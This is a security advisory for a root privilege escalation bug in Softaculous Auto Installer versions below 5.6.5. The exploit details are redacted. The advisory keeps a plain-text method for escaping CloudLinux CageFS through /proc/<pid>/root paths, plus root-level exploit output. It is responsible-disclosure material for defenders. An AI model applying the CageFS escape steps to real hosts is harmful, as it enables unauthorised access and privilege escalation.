Vulnerability

Note: Due to very simple exploitation technique, whole content was removed. Details might be revealed later.

Affected software: Softaculous Auto Installer versions below 5.6.5 for CentOS Web Panel, Directadmin and ISPmanager.

Softaculous ▒▒▒▒▒▒ ▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ▒▒▒ ▒▒▒▒▒▒▒ ▒▒▒ ▒▒ ▒▒ ▒▒▒▒ ▒▒▒ ▒▒▒ ▒▒▒▒▒▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒, ▒▒▒▒▒ ▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒▒▒▒▒ ▒▒▒▒ ▒▒ ▒▒▒▒▒▒▒ ▒▒▒▒▒▒ ▒▒▒▒ ▒▒▒ ▒▒▒▒ ▒▒▒▒▒▒▒▒▒, which in turn results in root privilege escalation.

Vulnerability is not exploitable inside CloudLinux CageFS due to ▒▒▒▒▒▒ ▒▒▒▒▒, however, thanks to vulnerability fixed with KMODLVE-385, at the time of discovery pretty much every system was vulnerable to CageFS bypass because patched LVE kernel module would require reboot or at least stopping all services to reload LVE module.

Exploit

If You are inside CageFS that is still vulnerable to the bug fixed with KMODLVE-385, just do ls -ld /proc/*/root/tmp - if tmp is owned by root, that path is outside CageFS. In CloudLinux 7 You might need to e.g. execute DirectAdmin plugin and hit exact time the plugin is running. In CloudLinux 8 there is usually an unconfined systemd process running as user. Go to Your home directory outside CageFS with cd /proc/<pid>/root/home/<user> and continue with instructions below.

Create ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ▒▒▒▒ ▒▒ ▒▒▒▒ ▒▒▒▒ ▒▒▒▒▒▒▒▒▒ ▒▒▒▒ ▒▒▒ ▒▒▒▒▒▒▒▒▒ ▒▒▒▒▒▒▒:

▒▒▒▒▒▒▒▒▒▒▒
▒▒ ▒▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒

Next, ▒▒▒ ▒▒▒ ▒▒▒▒▒▒▒▒▒ ▒▒▒▒▒▒▒ ▒▒ ▒▒▒▒:

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒

Check output file:

cat out.log

Output:

uid=0(root) gid=0(root) groups=0(root),1000(test)

Solution

Update Softaculous to version 5.6.5 or later.

Timeline

  • 2021-02-15 - Vulnerability reported to vendor.
  • 2021-02-16 - Response from vendor, Softaculous version 5.6.5 released with vulnerability fixed. According to the vendor, the same vulnerability was reported by Rack911 few hours before my report.